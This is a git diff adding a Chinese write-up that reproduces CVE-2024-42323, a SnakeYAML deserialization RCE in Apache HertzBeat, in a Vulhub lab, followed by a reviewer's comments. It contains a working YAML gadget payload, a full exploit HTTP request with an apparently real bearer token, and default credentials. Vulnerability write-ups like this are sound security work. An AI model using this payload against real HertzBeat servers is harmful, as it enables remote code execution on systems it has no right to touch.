diff --git a/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md b/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md new file mode 100644 index 0000000..8a7ad68 --- /dev/null +++ b/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md 
@@ -0,0 +1,80 @@ +# Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323 + +## 漏洞描述 + +Apache HertzBeat 是一款开源的实时监控告警工具,支持对操作系统、中间件、数据库等多种对象进行监控,并提供 Web 界面进行管理。 + +在 1.6.0 版本之前,HertzBeat 使用了存在安全漏洞的 SnakeYAML 库来解析 YAML 文件。当已认证用户通过 `/api/monitors/import` 或 `/api/alert/defines/import` 接口导入新的监控类型时,可以提供特制的 YAML 内容触发不受信任数据的反序列化,最终可能导致在目标系统上执行远程代码。 + +参考链接: + +- https://forum.butian.net/article/612 +- https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx + +## 漏洞影响 + +``` +Apache HertzBeat < 1.6.0 +``` + +## 环境搭建 + +Vulhub 执行如下命令启动存在漏洞的 HertzBeat 1.4.4 服务器: + +``` +docker compose up -d +``` + +服务启动后,访问 `http://your-ip:1157/dashboard` 进入 HertzBeat 控制面板。默认登录凭据为: + +- 用户名:`admin` +- 密码:`hertzbeat` + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090855824.png) + +## 漏洞复现 + +首先,准备一个恶意 YAML 文件,文件名必须以 `.yaml` 结尾,内容如下: + +```yaml +!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ] +``` + +然后登录 HertzBeat 后台,导航到任意监控页面并找到导入按钮,在这里将上面的恶意 YAML 文件导入: + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090950864.png) + +HertzBeat 对 YAML 文件进行反序列化时,触发远程代码执行: + +``` +POST /api/monitors/import HTTP/1.1 +Host: your-ip:1157 +Accept-Encoding: gzip, deflate +Accept-Language: en-US +Origin: http://your-ip:1157 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6788.76 Safari/537.36 +Accept: application/json, text/plain, */* +Referer: http://your-ip:1157/monitors +sec-ch-ua-platform: "Windows" +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvl3ne8kWpIEZzrNr +Authorization: Bearer 
eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jMsKwjAQRf9l1h0wj8akvyIuMs4I8dFKJhVB_HdT0OU593LecGkFJjjFwMLkMPlzQp8dY2S3QwqUKFg23hIMoCv1c-Z7mTsV1U66VplFFdtylRlV6lPqtuYGk9l7E8bReTuAvB5_EdMm6nKTXjj8gsfPF5W5Kao.lj6IwR1vmaTc2T0t2VJlwOCTMJeu4tlOejqygKjtlHV-vj2Ew2Cw5ljUv-9pGxDB_yKnfrKp89i4QhYoQAs8vA +Content-Length: 456 + +------WebKitFormBoundaryvl3ne8kWpIEZzrNr +Content-Disposition: form-data; name="file"; filename="test.yaml" +Content-Type: application/x-yaml + +!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ] + +------WebKitFormBoundaryvl3ne8kWpIEZzrNr-- +``` + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091514662.png) + +命令成功执行: + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091629839.png) + +## 漏洞修复 + +目前官方已有可更新版本,建议受影响用户升级至最新版本 Apache Hertbeat >= 1.6.0。官方下载地址: https://hertzbeat.apache.org/zh-cn/docs/download/ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png new file mode 100644 index 0000000..3e2ad15 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png differ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png new file mode 100644 index 0000000..a91568b Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png differ 
diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png new file mode 100644 index 0000000..01eb5f4 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png differ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png new file mode 100644 index 0000000..f54df65 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png differ
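Review bot: the `Authorization: Bearer eyJhbGciOiJIUzUxMiIs...` header in the captured request under "漏洞复现" carries a complete signed session token from the test instance; replace it with a placeholder such as `Authorization: Bearer <token>` before merging, since a real HS512 token in a public repository is both a credential and material for offline key recovery, and readers only need to know that the request must be authenticated. Same section, the "漏洞修复" paragraph misspells the product as "Apache Hertbeat" (should be "Apache HertzBeat"), and because "漏洞描述" already states that the import endpoints `/api/monitors/import` and `/api/alert/defines/import` are reachable only by an authenticated user, the fix section would be more useful to operators if it also recommended changing the default `admin`/`hertzbeat` credentials listed under "环境搭建" and restricting accounts that can use the import feature until the upgrade to >= 1.6.0 is done. Minor: "Vulhub 执行如下命令" reads awkwardly; "在 Vulhub 中执行如下命令" matches the wording used in the other write-ups.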